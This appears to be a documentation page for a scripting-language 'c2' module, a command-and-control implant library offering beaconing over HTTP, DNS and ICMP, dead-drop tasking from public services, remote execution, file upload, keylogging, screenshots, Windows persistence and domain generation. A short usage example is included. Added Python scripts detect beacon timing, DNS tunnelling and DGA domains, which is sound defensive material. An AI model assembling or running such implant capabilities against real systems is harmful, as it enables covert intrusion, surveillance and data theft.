ilusm.dev

c2

Command & Control framework - configurable beaconing over HTTP, DNS, and ICMP; dead drop resolvers (GitHub, Pastebin, Twitter, Slack, Discord); command parsing and execution; AES-GCM payload encryption; domain generation; transport rotation.

Load with: use c2

What this module does

c2 implements a command-and-control beaconing library for red-team and security-research tooling. It provides configurable beacon objects that describe how to call back to an operator - with jitter, multiple transport protocols, and AES-GCM encrypted payloads. Dead drop resolvers let an implant retrieve tasking from public internet services (GitHub raw content, Pastebin, Twitter RSS, Slack, Discord) rather than a dedicated C2 server. A domain generation algorithm produces a deterministic sequence of fallback domains from a seed value.

Quick example

use c2

# Configure a beacon
cfg = c2bea(60, 0.2, "https://example.com", "http")
# interval=60s, ±20% jitter, HTTP callback

# Generate a beacon payload (base64 JSON)
payload = c2gen(cfg, "command output here")

# Check in
c2che(cfg, "whoami output")

# Fetch tasking from a GitHub dead drop
raw = c2git("operator", "tasking-repo", "cmds.txt", nil)
cmd = c2par(raw)
c2exe(cmd)

# Encrypt a payload
enc_data = c2enc("sensitive data", "my-secret-key")
plain = c2dec(enc_data, "my-secret-key")

# Generate 5 DGA domains with seed 42 for .com
domains = c2dga(42, 5, "com")

Functions

Beacon configuration

c2bea(interval_secs, jitter, callback_url, protocol)

Creates a beacon config. jitter is a float (e.g. 0.2 for ±20%). protocol is "http", "dns", or "icmp". Sets a Chrome-like User-Agent string and initialises last_beacon: 0.

Beacon generation

c2gen(config, cmd_result)

Builds a beacon payload. Applies jitter to the interval via det.mix. Constructs {id, ts, result, next}, JSON-encodes it, then Base64-encodes the result. The id is a SHA-256 hash of a random number (via cry.s25).
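The jitter described above is also what a defender hunts for: a beacon built with c2bea(60, 0.2, ...) produces request gaps that stay within about ±20% of 60 s, which is far more regular than human browsing. The following is an added detection example (not part of the c2 module) that groups proxy log requests per source/destination pair, measures gap regularity, and counts hits on the four fixed callback paths listed under c2htt. The log format and the sample lines are constructed for this example; the request-count and coefficient-of-variation thresholds are assumptions to be tuned per environment.

```python
"""Beacon-interval hunting over proxy log lines (added defender-side example).

A beacon built with c2bea(60, 0.2, ...) calls back about every 60 s with
+/-20% spread, so one (src, dst) pair produces request gaps clustered around
a fixed period. This groups requests per pair, measures how regular the gaps
are, and counts hits on the four fixed callback paths the HTTP transport
picks from. Log format and log lines are constructed for this example.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from urllib.parse import urlsplit

# The path set named in the c2htt description (query string stripped before matching).
CALLBACK_PATHS = {"/api/v1/data", "/cdn/update", "/static/resource", "/js/lib.js"}

# Constructed sample: "<iso-timestamp> <src> <dst> <method> <path>" (not real traffic).
SAMPLE_LOG = """\
2024-01-01T10:00:00 10.0.0.5 203.0.113.7 POST /api/v1/data?v=3
2024-01-01T10:01:05 10.0.0.5 203.0.113.7 POST /cdn/update?v=9
2024-01-01T10:01:58 10.0.0.5 203.0.113.7 POST /static/resource?v=1
2024-01-01T10:03:02 10.0.0.5 203.0.113.7 POST /js/lib.js?v=4
2024-01-01T10:04:00 10.0.0.5 203.0.113.7 POST /api/v1/data?v=7
2024-01-01T10:04:55 10.0.0.5 203.0.113.7 POST /cdn/update?v=2
2024-01-01T10:00:03 10.0.0.8 198.51.100.2 GET /index.html
2024-01-01T10:00:20 10.0.0.8 198.51.100.2 GET /news
2024-01-01T10:07:41 10.0.0.8 198.51.100.2 GET /about
2024-01-01T10:08:02 10.0.0.8 198.51.100.2 GET /contact
2024-01-01T10:30:00 10.0.0.8 198.51.100.2 GET /index.html
"""


def parse_log(text):
    """Parse the constructed log format into (timestamp, src, dst, method, path) tuples."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, method, path = line.split()
        rows.append((datetime.fromisoformat(ts), src, dst, method, path))
    return rows


def pair_stats(rows):
    """Per (src, dst): request count, mean gap, coefficient of variation, callback-path hits."""
    by_pair = defaultdict(list)
    for ts, src, dst, _method, path in rows:
        by_pair[(src, dst)].append((ts, path))
    stats = {}
    for pair, events in by_pair.items():
        events.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        path_hits = sum(1 for _ts, p in events if urlsplit(p).path in CALLBACK_PATHS)
        if len(gaps) < 2:
            stats[pair] = {"count": len(events), "mean_gap": None, "cv": None, "path_hits": path_hits}
            continue
        m = mean(gaps)
        # Coefficient of variation: jittered beacons keep this small; browsing does not.
        cv = pstdev(gaps) / m if m else float("inf")
        stats[pair] = {"count": len(events), "mean_gap": m, "cv": cv, "path_hits": path_hits}
    return stats


def flag_beacons(stats, min_requests=5, max_cv=0.25):
    """Pairs with enough requests whose gap spread is tight enough to look like jittered beaconing.

    Thresholds are assumptions for this example; tune them against baseline traffic.
    """
    return sorted(pair for pair, s in stats.items()
                  if s["count"] >= min_requests and s["cv"] is not None and s["cv"] <= max_cv)


if __name__ == "__main__":
    stats = pair_stats(parse_log(SAMPLE_LOG))
    for pair in flag_beacons(stats):
        s = stats[pair]
        print(f"{pair[0]} -> {pair[1]}: {s['count']} requests, mean gap {s['mean_gap']:.1f}s, "
              f"cv {s['cv']:.2f}, {s['path_hits']} hits on known callback paths")
```

On the sample, the 10.0.0.5 pair has a mean gap of 59 s with a coefficient of variation under 0.1 and every request on a known callback path, while the browsing-like 10.0.0.8 pair has wildly varying gaps and is not flagged. The path-hit count is a secondary signal: the paths are generic enough to appear in legitimate traffic, so it should support the timing evidence rather than replace it.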

Callback protocols

c2htt(url, payload)

HTTP beacon. Randomly selects one of four URL paths (/api/v1/data, /cdn/update, /static/resource, /js/lib.js), appends a random version parameter, and POSTs the payload with a browser User-Agent and JSON accept header.

c2dns(domain, payload)

DNS beacon. Base32-encodes the payload, splits it into 63-character labels, joins with dots, and performs an A-record lookup for the resulting subdomain of domain.
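Seen from a resolver log, the encoding just described is distinctive: the subdomain part consists only of base32 alphabet characters, labels sit at the 63-byte maximum, and the name carries far more subdomain bytes than ordinary hostnames. The following is an added detection example (not code from the c2 module) that scores queried names on those properties and, for flagged names, re-joins the labels and base32-decodes them so an analyst can inspect what was carried. The sample queries are constructed; the registered zone is assumed to be the last two labels, and padding is assumed to have been stripped from the labels since "=" is not usable in a hostname label.

```python
"""Flagging DNS queries that carry base32-chunked payloads (added defender-side example).

The DNS transport described above base32-encodes the beacon payload, splits it
into 63-character labels and resolves the result as a subdomain of the operator
zone. In a resolver log that shows up as names whose subdomain part is made only
of base32 alphabet characters, with labels at the 63-byte maximum and far more
subdomain bytes than ordinary hostnames carry. Sample queries are constructed;
the zone is assumed to be the last two labels of the name.
"""
import base64
import binascii
import re

B32_LABEL = re.compile(r"^[a-z2-7]+$")   # RFC 4648 base32 alphabet, lowercased


def split_query(qname, zone_labels=2):
    """Separate subdomain labels from the registered zone (assumed: last two labels)."""
    labels = qname.rstrip(".").lower().split(".")
    return labels[:-zone_labels], ".".join(labels[-zone_labels:])


def try_b32_decode(labels):
    """Re-join the labels, restore stripped padding and decode; None if not valid base32."""
    joined = "".join(labels).upper()
    joined += "=" * (-len(joined) % 8)
    try:
        return base64.b32decode(joined)
    except (binascii.Error, ValueError):
        return None


def score_query(qname):
    """Score one queried name; decode the subdomain only when it looks like a payload carrier."""
    sub, zone = split_query(qname)
    subdomain_bytes = sum(len(label) for label in sub)
    all_b32 = bool(sub) and all(B32_LABEL.match(label) for label in sub)
    max_label = max((len(label) for label in sub), default=0)
    # Thresholds are assumptions: a full-length label or 100+ subdomain bytes is rare in normal DNS.
    suspicious = all_b32 and (max_label >= 63 or subdomain_bytes >= 100)
    decoded = try_b32_decode(sub) if suspicious else None
    return {"zone": zone, "labels": len(sub), "subdomain_bytes": subdomain_bytes,
            "max_label": max_label, "suspicious": suspicious, "decoded": decoded}


# Constructed stand-in payload (104 bytes) used only to build a sample query for this example.
CONSTRUCTED_MARKER = b"constructed-beacon-sample " * 4


def constructed_tunnel_query(zone="example.net"):
    """Build the sample query the way the transport is described (test input only)."""
    encoded = base64.b32encode(CONSTRUCTED_MARKER).decode().rstrip("=").lower()
    labels = [encoded[i:i + 63] for i in range(0, len(encoded), 63)]
    return ".".join(labels + [zone])


SAMPLE_QUERIES = [
    "www.example.com",
    "mail.example.com",
    "cdn2.static.example.net",
    constructed_tunnel_query(),
]

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        r = score_query(q)
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} zone={r['zone']} labels={r['labels']} bytes={r['subdomain_bytes']} "
              f"max_label={r['max_label']}")
        if r["decoded"] is not None:
            print("   decoded:", r["decoded"][:40], "...")
```

The constructed query decodes back to the 104-byte marker, with three labels of 63, 63 and 41 characters. In practice the decoded bytes would be the Base64 JSON that c2gen produces, so a second decode step would expose the {id, ts, result, next} structure for triage. The base32-alphabet test on its own is weak (most ordinary hostnames satisfy it), which is why the length conditions carry the decision.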

c2icm(target_ip, payload)

ICMP beacon. Sends the payload via host native __c2_icmp_send.

Dead drop resolvers

c2git(user, repo, file, token)

Fetches raw content from raw.githubusercontent.com/{user}/{repo}/main/{file}. Returns trimmed content, or nil on error.

c2twi(username)

Fetches a Twitter/X RSS feed for a username. Returns the raw response body (for parsing encoded commands from tweet text), or nil on error.

c2pas(paste_id)

Fetches raw content from pastebin.com/raw/{paste_id}. Returns the content or nil.

c2sla(token, channel)

Reads messages from a Slack channel via host native __c2_slack_read.

c2dis(channel_id, bot_token)

Fetches recent messages from a Discord channel via the Discord API. Returns the raw response body, or nil.

Command parsing and execution

c2par(raw_cmd)

Parses a command string. If it starts with "C2:", strips the prefix, Base64-decodes, and JSON-decodes to get {cmd, args}. Otherwise returns {cmd: raw_cmd, args: []}.

c2exe(cmd_obj)

Executes a parsed command object. Supported commands:

  • "exec" - runs a process via proc.procr
  • "download" - fetches a URL and writes to a local path
  • "upload" - reads a file, Base64-encodes it, POSTs to a URL
  • "screenshot" - calls __c2_screenshot
  • "keylog" - starts keylogger for N seconds via keylog.keylo
  • "sleep" - sleeps N seconds via tim.timsl

Persistence

c2per is overloaded by context.

c2per(key_name, value)

Persists a registry key-value pair via __c2_persist_reg.

c2per(task_name, cmd)

Creates a scheduled task via __c2_persist_task.

c2per(lnk_name, target)

Creates a Windows startup shortcut (.lnk) in the current user's Startup folder via __c2_create_lnk.

Encryption

c2enc(payload, key)

Encrypts a payload with AES-GCM. Generates a 12-byte random nonce via cry.cryrn, seals with cry.crysl, then Base64-encodes nonce + ciphertext.

c2dec(enc_payload, key)

Decrypts a payload. Base64-decodes, splits the first 12 bytes as the nonce, decrypts the remainder with cry.cryop.

Domain generation and transport rotation

c2dga(seed, count, tld)

Domain generation algorithm. Seeds a deterministic RNG with seed + i for each domain. Generates names of length 10–15 from a-z0-9, then appends the TLD. Returns a list of count domain strings.

c2rot(urls, current_idx)

Returns the URL at current_idx and the next index (wrapping). Use to rotate through a list of C2 URLs.
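Names produced the way c2dga describes (10 to 15 characters drawn from a-z0-9) combine properties that human-chosen names rarely do: near-maximal character entropy, few or no vowels, long runs of consonants and digits, and digits mixed into the label. The following is an added triage example (not part of the c2 module) that scores the registrable label of each queried domain on those features. The sample domains are constructed, and the feature thresholds and the score cut-off of 3 are assumptions meant as a starting point rather than tuned values.

```python
"""Scoring query names for DGA-like structure (added defender-side example).

c2dga produces fallback names 10-15 characters long drawn uniformly from a-z0-9,
so they show near-maximal character entropy, few vowels, long consonant/digit
runs and embedded digits. Human-chosen names rarely combine these. This scores
the registrable label of each name on those features; sample names are
constructed and the thresholds are assumptions, not tuned values.
"""
from collections import Counter
from math import log2

VOWELS = set("aeiou")


def shannon_entropy(s):
    """Bits of entropy per character, estimated from the label's own character frequencies."""
    n = len(s)
    if not n:
        return 0.0
    return -sum(c / n * log2(c / n) for c in Counter(s).values())


def features(label):
    """Length, entropy, vowel and digit ratios, and the longest run without a vowel."""
    chars = [c for c in label.lower() if c.isalnum()]
    n = len(chars)
    vowels = sum(c in VOWELS for c in chars)
    digits = sum(c.isdigit() for c in chars)
    run = longest = 0
    for c in chars:
        run = 0 if c in VOWELS else run + 1
        longest = max(longest, run)
    return {"length": n,
            "entropy": shannon_entropy("".join(chars)),
            "vowel_ratio": vowels / n if n else 0.0,
            "digit_ratio": digits / n if n else 0.0,
            "max_nonvowel_run": longest}


def dga_score(domain):
    """Score the registrable label (assumed: second-to-last label) and flag at 3 or more hits."""
    labels = domain.rstrip(".").lower().split(".")
    label = labels[-2] if len(labels) >= 2 else labels[0]
    f = features(label)
    # Each feature contributes one point; the thresholds are starting assumptions.
    score = sum(int(cond) for cond in (
        10 <= f["length"] <= 15,        # the length range c2dga generates
        f["entropy"] >= 3.0,            # close to the maximum for a short random label
        f["vowel_ratio"] < 0.25,        # pronounceable names carry more vowels
        f["digit_ratio"] >= 0.15,       # digits mixed into the name
        f["max_nonvowel_run"] >= 4,     # long consonant/digit runs
    ))
    return {"label": label, "score": score, "suspicious": score >= 3, **f}


# Constructed sample names: some plausible legitimate labels, two random-looking ones.
SAMPLE_DOMAINS = [
    "github.com",
    "cloudfront.net",
    "microsoftonline.com",
    "secure-login-portal.net",
    "x7k2q9vz4mrt.com",
    "h3jq8wzk0p1fd.com",
]


def triage(domains):
    """Return the domains whose label scores as DGA-like, highest score first."""
    scored = [(d, dga_score(d)) for d in domains]
    return sorted((d for d, r in scored if r["suspicious"]),
                  key=lambda d: -dga_score(d)["score"])


if __name__ == "__main__":
    for d in SAMPLE_DOMAINS:
        r = dga_score(d)
        print(f"{'DGA-like' if r['suspicious'] else 'ok':8} {d:26} score={r['score']} "
              f"len={r['length']} H={r['entropy']:.2f} vowels={r['vowel_ratio']:.2f} "
              f"digits={r['digit_ratio']:.2f} run={r['max_nonvowel_run']}")
```

Entropy alone does not separate the classes (a long brand name such as microsoftonline scores above 3 bits), which is why the vowel ratio, digit ratio and non-vowel run length are needed; the two random-looking samples hit all five features, while the legitimate-looking ones reach at most two. A production version would also whitelist known-good zones and look at NXDOMAIN rates, since a client walking a c2dga sequence resolves many names that do not exist.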

Check-in

c2che(beacon_config, results)

Generates a beacon payload and sends it over the configured protocol ("http" → c2htt, "dns" → c2dns, "icmp" → c2icm). Returns nil for unknown protocols.

Notes

  • This module is intended for authorised red-team operations and security research only.
  • Host natives required: __c2_icmp_send, __c2_slack_read, __c2_screenshot, __c2_persist_reg, __c2_persist_task, __c2_create_lnk.
  • Requires trl, txt, and cry.